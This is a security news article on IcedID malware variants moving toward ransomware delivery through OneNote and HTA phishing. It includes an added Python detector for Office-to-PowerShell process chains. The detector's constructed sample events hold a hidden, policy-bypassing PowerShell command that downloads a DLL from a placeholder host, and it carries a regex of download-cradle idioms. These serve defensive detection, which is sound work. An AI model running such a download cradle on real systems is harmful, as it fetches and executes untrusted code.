IcedID malware transitioning to ransomware payloads

New variants are being delivered by at least three different threat actors


Proofpoint researchers have observed three new variants of the IcedID malware that have shifted the focus from launching banking trojans to delivering ransomware payloads.[1]

The new variants have been deployed by multiple threat actors, some of them using personalized invoice-themed phishing emails to distribute them. These messages carry a Microsoft OneNote attachment (.one) that, when opened, executes an embedded malicious HTA file; the HTA runs a PowerShell command that fetches IcedID from a remote resource, while the victim is shown a decoy PDF.

IcedID had been deployed in numerous malicious campaigns with little code change since 2017.[2] Removing functions the operators no longer need, such as those tied to its original banking-fraud role, makes the new variants leaner and stealthier, which helps the threat actors evade detection.
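The chain described above (Office application, then a script host, then a PowerShell download cradle) is a parent-child pattern that process-creation telemetry exposes well. The following detection logic is an added example written for this page, not code from Proofpoint or from the article's author; the process-creation records it runs over are constructed to resemble Sysmon Event ID 1 fields (PID, parent PID, image path, command line) and are not real telemetry, and the download URL in them is a placeholder.

```python
"""Flag Office -> script host -> PowerShell download chains in process-creation events.

Added example. Sample events below are constructed (not real telemetry).
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (the Sysmon Event ID 1 fields we need)."""
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str    # its command line


OFFICE_PARENTS = {"onenote.exe", "winword.exe", "excel.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# PowerShell idioms commonly used to pull a second stage from a remote host.
DOWNLOAD_CRADLE = re.compile(
    r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadstring|downloadfile|"
    r"net\.webclient|start-bitstransfer|invoke-restmethod|\birm\b",
    re.IGNORECASE,
)


def image_name(path: str) -> str:
    """Lower-cased file name of an image path, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(ev: ProcEvent, by_pid: Dict[int, ProcEvent], max_depth: int = 5) -> List[ProcEvent]:
    """Return [ev, parent, grandparent, ...] until the parent is unknown or max_depth is hit."""
    chain = [ev]
    seen = {ev.pid}
    while len(chain) < max_depth:
        parent = by_pid.get(chain[-1].ppid)
        if parent is None or parent.pid in seen:  # PID reuse can create loops; stop there
            break
        seen.add(parent.pid)
        chain.append(parent)
    return chain


def classify(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> Optional[dict]:
    """Score a shell process by its ancestry and command line; None if not interesting."""
    if image_name(ev.image) not in SHELLS:
        return None
    names = [image_name(p.image) for p in ancestry(ev, by_pid)]
    office_idx = next((i for i, n in enumerate(names) if n in OFFICE_PARENTS), None)
    if office_idx is None:
        return None  # no Office application in the ancestry: out of scope here
    via_script_host = any(n in SCRIPT_HOSTS for n in names[1:office_idx])
    cradle = bool(DOWNLOAD_CRADLE.search(ev.cmdline))
    if via_script_host and cradle:
        severity = "high"      # the full OneNote -> HTA -> PowerShell-download chain
    elif via_script_host or cradle:
        severity = "medium"
    else:
        severity = "low"       # Office spawning a shell is still worth a look
    return {
        "pid": ev.pid,
        "severity": severity,
        "chain": " -> ".join(reversed(names[: office_idx + 1])),
        "download_cradle": cradle,
    }


def find_office_to_shell_chains(events: List[ProcEvent]) -> List[dict]:
    """Run classify() over every event; findings keep the input order."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        f = classify(e, by_pid)
        if f is not None:
            findings.append(f)
    return findings


# Constructed sample telemetry (hypothetical paths, PIDs and URL).
SAMPLE_EVENTS = [
    ProcEvent(980, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(4100, 980, r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
              r'"ONENOTE.EXE" "C:\Users\alice\Downloads\Invoice_0312.one"'),
    ProcEvent(4212, 4100, r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Users\alice\AppData\Local\Temp\OneNote\16.0\Exported\open.hta"'),
    ProcEvent(4300, 4212, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -ep bypass -c "Invoke-WebRequest '
              'http://example.invalid/stage2.dll -OutFile $env:TEMP\\s.dll"'),
    # Benign: PowerShell started from the desktop shell, no Office ancestry.
    ProcEvent(5000, 980, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -c Get-Process"),
    # Lower confidence: Word spawning cmd.exe directly, no script host, no cradle.
    ProcEvent(5100, 5050, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "WINWORD.EXE"),
    ProcEvent(5110, 5100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
]

if __name__ == "__main__":
    for finding in find_office_to_shell_chains(SAMPLE_EVENTS):
        print(finding)
```

The scoring deliberately separates the two signals: the script-host hop (mshta.exe between OneNote and PowerShell) and the download cradle in the command line. Either one alone is noisy in environments with legitimate macros or admin scripts, but together they reproduce the chain the campaign uses; tune the parent and shell sets to what your own baseline shows.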

The new variants

Proofpoint researchers discovered the first new variant of IcedID, known as “IcedID Lite,” in November 2022. The variant was distributed as a follow-on payload in a campaign by TA542, Proofpoint's designation for the Emotet operators.[3] The researchers believe that the original operators behind Emotet have been using an IcedID variant with different functionality from the standard build.

Another new variant, called “Forked,” appeared in February 2023, distributed through personalized invoice-themed phishing emails. At the end of February, researchers observed a low-volume campaign distributing IcedID “Forked” via fake notices that cited the National Traffic and Motor Vehicle Safety Act and impersonated the U.S. Food and Drug Administration (FDA).

While some threat actors use the new variants of IcedID, others still deploy the “Standard” variant, with one of the most recent campaigns dating back to March 10, 2023. IcedID, like Emotet, is a two-stage malware: a small first stage whose job is to fetch and load additional malicious code. That behavior pattern is easier to identify than a single-stage payload, because the loader has to reach out for its second stage.

Experts' views

Antony Farrow, Senior Director of Solution Architecture at Gurucul, said that these malware behavior patterns make it easier to identify two-stage malware. He added that Emotet and IcedID are known for stealing banking credentials, and now it's transitioned into a C2 loader providing malicious actors with a much more fluid vehicle. It’s naive to believe malware and cyber criminals will stay in their lane, avoiding the use of their best malware and phishing campaigns because an organization is in the “wrong” sector.[4]

According to Craig Burland, Chief Information Security Officer at Inversion6, Proofpoint's research is unwelcome news for cyber defenders, demonstrating cybercriminals acting as digital innovators and savvy entrepreneurs. Burland said the high number of actors and campaigns involving IcedID suggests a potent and flexible strain of malware, which lends itself to other uses.

Krishna Vishnubhotla, Vice President of Product Strategy at Zimperium, said banking malware evolves every year, much like the flu, with the rise of malware-as-a-service. He said that the rapid rate at which malware can infect millions of devices through social engineering and phishing makes it particularly effective on mobile devices.

Vishnubhotla suggested that banks must integrate in-app runtime protection solutions that leverage machine learning within their mobile applications to detect and defend themselves against sophisticated banking malware today. Mobile banking apps need to become risk-aware and self-defending as a practical measure.

About the author
Gabriel E. Hall - Passionate web researcher

Gabriel E. Hall is a passionate malware researcher who has been working for 2-spyware for almost a decade.
